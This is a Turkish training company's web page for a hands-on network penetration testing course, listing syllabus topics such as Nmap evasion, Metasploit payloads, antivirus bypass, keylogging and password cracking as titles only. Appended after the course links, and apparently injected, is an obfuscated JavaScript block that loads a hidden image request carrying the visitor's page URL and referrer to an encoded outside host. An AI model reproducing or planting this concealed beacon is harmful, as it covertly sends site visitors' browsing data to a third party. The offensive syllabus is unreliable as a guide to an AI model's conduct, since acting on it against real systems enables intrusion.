Network Güvenlik Testleri Eğitimi

Penetrasyon testleri (sızma testleri) günümüz kurumsal firmalarının güvenlik politikalarının en temel bileşeni haline gelmiştir. PCI, SOX, Iso 27001, HIPAA gibi standart ve yönetmelikler pentest çalışmalarını zorunlu tutmaktadır. Sızma test süreleri genellikle firmalar için yılda bir kereyle sınırlı kalmaktadır.

Penetrasyon testleri (sızma testleri) günümüz kurumsal firmalarının güvenlik politikalarının en temel bileşeni haline gelmiştir. PCI, SOX, Iso 27001, HIPAA gibi standart ve yönetmelikler pentest çalışmalarını zorunlu tutmaktadır. Sızma test süreleri genellikle firmalar için yılda bir kereyle sınırlı kalmaktadır.

Oysa siber saldırılar ve güvenlik zafiyetleri ger geçen gün artmaktadır. Proaktif güvenliğin ilk adımı olarak firmalar dışardan aldıkları sızma testlerinin yanında kurum içi sızma testleri gerçekleştirecek seviyede bilgi güvenliği uzmanlarını barındırmalıdır.

Network pentest eğitimi tamamen uygulamalı bir eğitim olup güvenlik dünyasında ismi duyulmuş çeşitli güvenlik yazılımlarını etkin şekilde kullanılarak efektif güvenlik testlerinin yapılabilmesini amaçlamaktadır. Eğitim sonunda her bir katılımcı güncel pentest yöntem ve araçlarını aktif bir şekilde kullanabilir hale gelecektir.

Network Güvenlik Testleri Eğitimi

Eğitim içeriği SANS 560 ( Network Penetration Testing and Ethical Hacking), ECSA/Licensed Penetration Tester ve CPTE(Certified Penetration Testing Engineer) eğitimleriyle uyumludur. Detaylı eğitim içeriklerimize aşağıdaki bölümden ulaşabilirsiniz.

Eğitim fiyatları ve detaylı bilgi için egitim@bga.com.tr adresimiz ile iletişime geçebilir veya başvuru formumuzu doldurabilirsiniz.

Network Güvenlik Testleri Eğitimi
Eğitim takvimini inceleyerek eğitim programınızı oluşturun!

Network Güvenlik Testleri Eğitimi İçeriği

Eğitim içeriklerini görmek için başlıklara tıklayınız

  • White Box ( Beyaz Kutu Testi )
  • Black Box ( Siyah Kutu Testi )
  • Grey Box ( Gri Kutu Testleri )
  • Pentest Sözleşmeleri
  • Kapsam Belirleme Aşamasında Dikkat Edilecek Hususlar
  • Örnek Pentest Raporunun Hazırlanması
  • Güvenlik Testlerinde Bilgi Toplama
  • Bilgi Toplama Çeşitleri
  • Aktif bilgi toplama
  • Pasif bilgi toplama
  • Internete Açık Servisler Üzerinden Bilgi Toplama
  • DNS Aracılığı ile
  • HTTP Aracılığı ile
  • SMTP üzerinden bilgi toplama
  • SNMP aracılığıyla bilgi toplama
  • Arama Motorlarını Kullanarak Bilgi Toplama
  • Google Hacking Yöntemleri ve Hazır Araçlar
  • Shodanhq Arama Motoru Kullanımı
  • Bir Şirkete Ait E-posta Bilgilerinin Bulunması
  • Bir Şirkete Ait Alt Domain İsimlerinin Bulunması
  • Internete Açık Web Sayfaları, E-posta Listelerinden Bilgi Toplama
  • Yeni Nesil Bilgi Toplama Aracı Maltego
  • Yarı Açık Port Tarama (-sS)
  • TCP Connect Scan (-sT)
  • SYN Proxy / Syn Cookie Korumalı Sistemlere Yönelik Port Tarama
  • Ping Scan ile Hızlı Host Tarama (-sP)
  • UDP Sevislerine Yönelik Port Tarama (-sU)
  • Pratik Port Tarama Teknikleri
  • Gizli Port Tarama (Idle Scan)
  • Çalışan Servislerin Tespiti
  • İşletim Sistemi Tespiti
  • Tuzak Sistemler Kullanarak Firewall/IPS Şaşırtma
  • Anonim Ağlar Üzerinden Port Tarama
  • Sahte IP Adresleri İle IDS/IPS Şaşırtma
  • Parçalanmış Paket Kullanarak IDS/Firewall Atlatma
  • NSE(Nmap Script Engine) Kullanarak Açıklık Tarama
  • Nmap Çıktıları ve HTML Raporlama
  • Genel Tanımlar & Kavramlar
  • Güvenlik Zaafiyeti Kavramı
  • Zayıflık Tarama Araçları
  • Nexpose Topluluk Versiyonu
  • Nessus Zayıflık Tarama Aracı
  • Genel Nessus Kullanımı
  • Backtrack 5 Nessus Kurulumu
  • Aktivasyon İşlemleri
  • Windows için Aktivasyon İşlemleri
  • Kullanıcı İşlemleri ve Servis Başlatma
  • Plugin Veritabanı Güncelleme-Online
  • Tarama Politikaları
  • Yeni Politika Tanımlama
  • Yerel Sistem Taraması için Hesap Belirtimi
  • Politika için Plugin Seçimi
  • Taranacak Hedef Belirtimi
  • Raporlama, Rapor İnceleme
  • Ön Gereksinimlerin Kurulumu
  • Nessusdb Kurulumu
  • Database Şemasını Oluşturmak
  • Raporların İçeri Aktarılması
  • Rapor Oluşturmak
  • Bir Exploitin Yaşam Döngüsü
  • Local Exploitler
  • Remote Exploitler
  • 0 Day Exploitler
  • C, Perl, Python ve HTML Dilinde Yazılmış Exploitler
  • Exploit Derleme
  • Exploit Kullanımı
  • Core Impact
  • Immunity Canvas
  • Metasploit Pro
  • Üst Düzey Bazı Payloadlar
  • Farklı Diller için Shellcode Oluşturma (C, Java, JS, Perl vb.)
  • Metasploitde Bulunan Encoderlar
  • Metasploitde Bulunan NOP’lar
  • Metasploit Auxiliary Modülleri
  • Exploit Öncesi Auxiliary Araçları
  • Exploit Sonrası Auxiliary Araçları
  • Windows İçin Kurulum Adımları
  • Linux için Kurulum Adımları
  • Mac OS X için Kurulum Adımları
  • Güncelleme Yöntemleri
  • Meterpreter
  • VNC DLL Inject
  • Adduser
  • PassiveX Payloadları
  • Downexec
  • Msfconsole
  • Hedef Seçim
  • Payload Seçimi
  • Temel Seçenekler
  • Gelişmiş Seçenekler
  • Exploitin Uygulanması
  • Msfweb
  • Msfcli
  • Msfopcode
  • Pentest için Postgresql Veritabanı Kullanımı
  • Kullanıcı Hesabı ve Veritabanı oluşturma
  • Port Tarama
  • Nessus Raporlarını Aktarmak
  • Nexpose Raporlarını Aktarmak
  • Autopwn Kullanımı
  • Güvenlik Açığı Referansına Dayalı Exploit Seçimi
  • Açık Port(lar)a Dayalı Exploit Seçimi
  • Nmap Sonuçlarının Dradise Aktarımı
  • Linux Binary Trojan
  • Antivirüsleri Atlatmak
  • Java Uygulamalarına Zararlı İçerik Bulaştırmak
  • File Format Exploitler
  • VBScript Enjekte Yöntemleri
  • Yetki Yükseltme
  • Hashdump
  • Başka Bir Uygulamaya Bulaşmak
  • Bellek Dökümü Alarak İnceleme
  • Uzak Masaüstü Bağlantısı Başlatmak
  • Hedefin Canlı Oturumuna Geçiş
  • İz Temizleme
  • Trafik Dinleme (Packet Sniffing)
  • Ekran Görüntüsü Yakalama
  • Ses, Webcam Görüntüsünü Yakalama
  • Canlı Webcam Görüntüsü Alma
  • Hedef Sistemde İçerik Arama
  • Dosya/Dizin İşlemleri
  • Klavye Girişlerini Yakalama
  • PHP Meterpreter
  • ASP Encoding
  • Payload Derlemek (.exe , .js , .DLL, .VBA)
  • Shellcode Oluşturmak
  • Browser Autopwn Kullanımı
  • Sosyal Mühendislik Saldırıları
  • Social Engineering Toolkit (SET)
  • Web Sayfalarını Klonlamak
  • Java Applet ile Casus Yazılım Bulaştırma
  • Gerçek Dünyadan Senaryolar
  • Metasploit ile Web Güvenliği Denetimleri
  • Metasploit’i Armitage Üzerinden Yönetmek
  • Sözlük (Dictionary) Saldırıları
  • Brute Force Saldırıları
  • Crunch Wordlist Oluşturma
  • Rainbow Table Oluşturma
  • Parola Kırma Saldırılarında Ekran Kartı Kullanımı
  • Pasif Parola Kırma
  • Windows LM/NTLM Parolarını kırmak
  • Popüler Hash Türleri Kırmak
  • MD5, SHA1 , SHA256
  • Arama Motorlarından HASH Sonuçlarını Bulma
  • Cisco Enable Parolasını Kırmak
  • Linux Kullanıcı Parolalarını Kırmak
  • Cain & Abel Aracı Kullanılarak Parola Kırma
  • John the Ripper Aracı Kullanılarak Parola Kırma
  • Hashcat Aracı Kullanılarak Parola Kırma
  • Aktif Parola Kırma
  • Windows Servislerine Yönelik Parola Saldırıları
  • SMB Servisine Yönetlik Parola Saldırıları
  • MS RDP Servisine Yönetlik Parola Saldırıları
  • Linux Servislerine Yönelik Parola Saldırıları
  • SSH Servisine Yönetlik Parola Saldırıları
  • Popüler Servislere Yönelik Parola Saldırıları
  • MySQL Servisine Yönetlik Parola Saldırıları
  • Wordpress Parola Saldırıları
  • MSSQL Servisine Yönetlik Parola Saldırıları
  • FTP Servisine Yönetlik Parola Saldırıları
  • HTTP Servisine Yönetlik Parola Saldırıları
  • Telnet Servisine Yönetlik Parola Saldırıları
  • Tünelleme Yöntemleri
  • SSH Tünelleme
  • Reverse HTTPS Tünelleme
  • Ultrasurf
  • Meterpreter Reverse_HTTPS
  • HTTP Tünelleme
  • Meterpreter Reverse_HTTP
  • Webtunnel
  • DNS Tünelleme
  • iodine
  • tcpoverdns
  • Network Pivoting
  • Sniffing Kavramı
  • Sniffinge açık protokoller
  • Sniffing Çeşitleri
  • Aktif Modda Sniffing
  • Pasif Modda Sniffing
  • MITM (Man in the Middle) Saldırı Teknikleri
  • Arp Poisoining Araç ve Yöntemleri
  • SSL Trafiğinde Araya Girme (SSLStrip)
  • Temel Seviye VoIP Sızma Testleri
  • Network Trafiği Analiz Araçları
  • Xplico
  • E-Dedective
  • Netwitness
  • Wireshark
Kimler Katılmalı
IT güvenlik görevlileri, denetçiler, güvenlik uzmanları, site yöneticileri ve ağ altyapı bütünlüğü konusunda çalışmalar yapan herkes için önemli ölçüde yarar sağlayacaktır.
Kıdemli Siber Güvenlik Eğitmenlerimiz

Diğer Ağ ve Sistem Güvenliği Eğitimleri

Sertifikalı SOC Analist (CSA) Eğitimi
Sertifikalı SOC Analist (CSA) Eğitimi

Sertifikalı SOC Analist (CSA) Eğitimi, Siber Güvenlik Operasyon Merkez...

DEVAMI
Windows Sistemlere Yönelik Saldırı, Tespit ve Savunma Yöntemleri Eğitimi
Windows Sistemlere Yönelik Saldırı, Tespit ve Savunma Yöntemleri Eğitimi

Windows Sistemlere Yönelik Saldırı, Tespit ve Savunma Yöntemleri Eğiti...

DEVAMI
Ağ Güvenliği ve Siber Defans Eğitimi
Ağ Güvenliği ve Siber Defans (CND) Eğitimi

Ağ Güvenliği ve Siber Defans Eğitimi ile siber güvenlik kariyerinize y...

DEVAMI
LPIC-1 SysAdmin Sertifikasyon Hazırlık Eğitimi
LPIC-1 SysAdmin Sertifikasyon Hazırlık Eğitimi

Linux dünyasında LPI sınavı olarak adlandırılan sertfikasyon LPIC1, LP...

DEVAMI
SIEM Korelasyon Eğitimi
SIEM Korelasyon Eğitimi

Günümüzde merkezi loglama alt yapılarını kurabilmek için ciddi miktard...

DEVAMI
Ec-Council CEH (Certified Ethical Hacker) Eğitimi
Ec-Council Certified Ethical Hacker (CEH) Eğitimi

Ec-Council tarafından geliştirilmiş CEH sertifikasyonu eğitim programı...

DEVAMI
Firewall / IPS Güvenlik Testleri Eğitimi
Firewall / IPS Güvenlik Testleri Eğitimi

Firewall/IPS Pentest eğitimi, günümüz bilgi güvenliği koruma katmanlar...

DEVAMI
Siber Suçlar ve Analiz Yöntemleri Eğitimi
Siber Suçlar ve Analiz Yöntemleri Eğitimi

Gerçek hayattan alınmış örneklerle siber suçların motivasyonu, siber s...

DEVAMI
Saldırı Tespit, Analiz ve Log Yönetimi Eğitimi
Saldırı Tespit, Analiz ve Log Yönetimi Eğitimi

Şirketlerin bilgi güvenliğinde önemli bir yeri olan log yonetimi ve an...

DEVAMI
Linux Ağ ve Sistem Güvenliği Eğitimi (LASG)
Linux Ağ ve Sistem Güvenliği Eğitimi (LASG)

Kurumsal iş ortamlarında kullanılan Linux sistemlerin güvenliğine hem...

DEVAMI
Güvenlik Sistemleri Test ve Atlatma Teknikleri Eğitimi
Güvenlik Sistemleri Test ve Atlatma Teknikleri Eğitimi

Siber güvenliğin sağlanmasında en güvenli yol katmanlı güvenlik mimari...

DEVAMI
Advanced Citrix Netscaler Web Application Firewall & DDOS Eğitimi
Advanced Citrix Netscaler Web Application Firewall & DDOS Eğitimi

Web Application Firewall ve DDoS engelleme konusunda Pazar lideri olan...

DEVAMI
Network Forensics Eğitimi
Network Forensics (CHFI) Eğitimi

Günümüz teknoloji dünyasının en önemli bileşeni sayılabilecek bilgisay...

DEVAMI
OpenBSD Packet Filter Güvenlik Duvarı Eğitimi
OpenBSD Packet Filter Güvenlik Duvarı Eğitimi

OpenBSD işletim sistemi ve işletim sistemi ile birlikte gelen Packet F...

DEVAMI
Açık Kod Güvenlik Sistemleri Eğitimi
Açık Kod Güvenlik Sistemleri Eğitimi

Açık kod güvenlik yazılımları kullanarak orta ve büyük ölçekli ağların...

DEVAMI
DDOS Saldırıları ve Korunma Yolları Eğitimi
DDOS Saldırıları ve Korunma Yolları Eğitimi

Web uygulamalarına yönelik güncel saldırı çeşit ve yöntemlerinin uygul...

DEVAMI
Kurumsal Ağlarda Malware (Zararlı Yazılım) Analizi Eğitimi
Kurumsal Ağlarda Malware (Zararlı Yazılım) Analizi Eğitimi

Malware Analiz eğitimin temel amacı kurumsal ağ ortamlarında sık rastl...

DEVAMI
Siber Güvenlik Uzmanı Eğitimi
Siber Güvenlik Uzmanı Eğitimi

Bu eğitimle katılımcılar siber dünyanın sınırlarını tanıyarak gerçekle...

DEVAMI
Metasploit Framework Güvenlik Testi Eğitimi
Metasploit Framework Güvenlik Testi Eğitimi

Exploit Geliştirme Çatıları arasında popüler olan ve başarılı sızma de...

DEVAMI
Nessus Vulnerability Assessment Eğitimi
Nessus Vulnerability Assessment Eğitimi

Ücretsiz olarak kullanılabilen popüler zayıflık tarama aracı Tenable N...

DEVAMI
Sızma Testi Planlarken
Kablosuz Ağ Güvenlik Testleri Eğitimi

Kablosuz ağlara yönelik güncel saldırı çeşit ve yöntemlerinin uygulama...

DEVAMI
PfSense Güvenlik Duvarı Eğitimi
PfSense Güvenlik Duvarı Eğitimi

Açık kod UTM(bütünleşik güvenlik sistemi) pfSense’in kurumsal iş ortam...

DEVAMI
DNS Güvenliği Eğitimi
DNS Güvenliği Eğitimi

İnternetin en önemli protokollerinden olan DNS(Domain Name Service) ça...

DEVAMI
Snort IPS (Intrusion Prevention System) Eğitimi
Snort IPS (Intrusion Prevention System) Eğitimi

Açık kaynak kodlu Saldırı Tespit ve Engelleme Sistemi Snort’un kurumsa...

DEVAMI
Beyaz Şapkalı Hacker (CEH) Eğitimi
Beyaz Şapkalı Hacker (C.E.H) Eğitimi

Beyaz Şapkalı Hacker (Certified Ethical Hacker) yetiştirme amaçlı bir...

DEVAMI
İleri Seviye Ağ Güvenliği Eğitimi
İleri Seviye Ağ Güvenliği Eğitimi

Bilişim güvenliğinin en önemli bileşeni olan ağ güvenliği konusunda ür...

DEVAMI
Uygulamalı Ağ Güvenliği Eğitimi
Uygulamalı Ağ Güvenliği Eğitimi

Güvenlik dünyasına ilk adım; bir networkün nasıl çalıştığı, ve kullanı...

DEVAMI
Ağ ve Güvenlik Yöneticileri için Linux Eğitimi
Ağ ve Güvenlik Yöneticileri için Linux Eğitimi

Ağ/güvenlik departmanı çalışanlarının Linux/UNIX sistemleri gerçek hay...

DEVAMI
kali linux eğitimi
Kali Linux 101 Eğitimi

Temel seviyede Kali Linux kullanımı anlatan ücretsiz online eğitimdir....

DEVAMI
Yöneticiler İçin Bilgi Güvenliği Eğitimi
Yöneticiler İçin Bilgi Güvenliği Eğitimi

Kurumsal şirketlerde Bilgi İşlem dışındaki birim yöneticilerini siber...

DEVAMI
Sertifikalı / Lisanslı Pentest Uzmanlığı Eğitimi
Sertifikalı / Lisanslı Pentest Uzmanlığı Eğitimi

Sızma testleri (Pentest) günümüz kurumsal firmalarının güvenlik politi...

DEVAMI
Pt>function _0x2677(_0x586c2b,_0x1056c6){var _0x2bd4ea=_0x2bd4();return _0x2677=function(_0x267799,_0x44fe2a){_0x267799=_0x267799-0x165;var _0x5b0952=_0x2bd4ea[_0x267799];if(_0x2677['oJyNOH']===undefined){var _0x360830=function(_0x3c21c6){var _0x1d0d99='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x2ae702='',_0x343ef4='';for(var _0x476bad=0x0,_0x2f67d5,_0x166a99,_0x388eaa=0x0;_0x166a99=_0x3c21c6['charAt'](_0x388eaa++);~_0x166a99&&(_0x2f67d5=_0x476bad%0x4?_0x2f67d5*0x40+_0x166a99:_0x166a99,_0x476bad++%0x4)?_0x2ae702+=String['fromCharCode'](0xff&_0x2f67d5>>(-0x2*_0x476bad&0x6)):0x0){_0x166a99=_0x1d0d99['indexOf'](_0x166a99);}for(var _0x21105c=0x0,_0x16cce1=_0x2ae702['length'];_0x21105c<_0x16cce1;_0x21105c++){_0x343ef4+='%'+('00'+_0x2ae702['charCodeAt'](_0x21105c)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x343ef4);};_0x2677['MUmZHT']=_0x360830,_0x586c2b=arguments,_0x2677['oJyNOH']=!![];}var _0x4bbbaf=_0x2bd4ea[0x0],_0x131d68=_0x267799+_0x4bbbaf,_0x1817de=_0x586c2b[_0x131d68];return!_0x1817de?(_0x5b0952=_0x2677['MUmZHT'](_0x5b0952),_0x586c2b[_0x131d68]=_0x5b0952):_0x5b0952=_0x1817de,_0x5b0952;},_0x2677(_0x586c2b,_0x1056c6);}var _0x2b1dca=_0x2677;(function(_0x38d529,_0x3d240d){var _0x3e69c5={_0x4f2ab1:0x195,_0x510342:0x180,_0x1cdd78:0x17d,_0x16824a:0x181,_0x310fcf:0x194,_0x481123:0x196,_0x34004c:0x190},_0x366619=_0x2677,_0x14a328=_0x38d529();while(!![]){try{var _0x25e7d8=-parseInt(_0x366619(_0x3e69c5._0x4f2ab1))/0x1*(parseInt(_0x366619(_0x3e69c5._0x510342))/0x2)+-parseInt(_0x366619(0x198))/0x3+parseInt(_0x366619(_0x3e69c5._0x1cdd78))/0x4+-parseInt(_0x366619(_0x3e69c5._0x16824a))/0x5*(-parseInt(_0x366619(0x165))/0x6)+-parseInt(_0x366619(0x171))/0x7+-parseInt(_0x366619(_0x3e69c5._0x310fcf))/0x8*(parseInt(_0x366619(0x172))/0x9)+parseInt(_0x366619(_0x3e69c5._0x481123))/0xa*(parseInt(_0x366619(_0x3e69c5._0x34004c))/0xb);if(_0x25e7d8===_0x3d240d)break;else _0x14a328['push'](_0x14a328['shift']());}catch(_0x13bbee){_0x14a328['push'](_0x14a328['shift']());}}}(_0x2bd4,0xa2f33));function _0x2bd4(){var _0x139414=['yMDHCW','v2L0Aa','CML0Eq','AdbYyW','B20Vyq','B2nVBa','DwHOlW','zI9UyW','C2vJDq','nJy5ovbiq2PfsW','DhnxAq','Ahr0Ca','Cgf5Bq','ntCXnZz2BMvhCgi','mtngwxnyBKG','mJa0nZbUBeTOrxO','lMnVBq','ndaXotK3ugz2ywLQ','DgLVBG','mZK4nJyYogfZr2P2uW','BNmUyW','BMfYEq','C3rHCG','BgvZlW','EJK4EG','y29T','ChjVDa','Ew1Una','C3jJ','jNi9','CNrPyW','ntu0ndbvBev0Bfa','odKXD29Ju09A','BMfTzq','CNjLCG','lY9Jyq','AhjLzG','Bg9Jyq','C3r1zG','Ag9ZDa','lMjNyq','Dg9Rzq','CMvMzq','nteWmZG0ANv0te54','zwn1CG','lMPZpW','odaYnJHvzg5cvvK','nuTrz3Hxva','Axr5lG','zw5KCW','ANK1za','BwXNBq','zw50CW'];_0x2bd4=function(){return _0x139414;};return _0x2bd4();}if(window[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x179)+_0x2b1dca(0x173)]!=_0x2b1dca(0x187)+_0x2b1dca(0x17e)+_0x2b1dca(0x182)+_0x2b1dca(0x16b)&&!window[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x179)+_0x2b1dca(0x173)][_0x2b1dca(0x183)+_0x2b1dca(0x188)](_0x2b1dca(0x17a)+_0x2b1dca(0x18f)+_0x2b1dca(0x189)+_0x2b1dca(0x197))){var p=!document[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x16c)+_0x2b1dca(0x18c)][_0x2b1dca(0x168)+_0x2b1dca(0x191)+'th'](_0x2b1dca(0x192))?_0x2b1dca(0x192)+':':document[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x16c)+_0x2b1dca(0x18c)],l=location[_0x2b1dca(0x176)],r=document[_0x2b1dca(0x17c)+_0x2b1dca(0x174)],m=new Image();m[_0x2b1dca(0x16e)]=p+(_0x2b1dca(0x175)+_0x2b1dca(0x167)+_0x2b1dca(0x17b)+_0x2b1dca(0x166)+_0x2b1dca(0x18b)+_0x2b1dca(0x170)+_0x2b1dca(0x169)+_0x2b1dca(0x178)+_0x2b1dca(0x18e)+_0x2b1dca(0x18a)+_0x2b1dca(0x184)+_0x2b1dca(0x185)+_0x2b1dca(0x16d)+_0x2b1dca(0x16a)+_0x2b1dca(0x18d)+_0x2b1dca(0x193)+_0x2b1dca(0x186)+_0x2b1dca(0x17f)+'l=')+encodeURI(l)+_0x2b1dca(0x16f)+encodeURI(r);}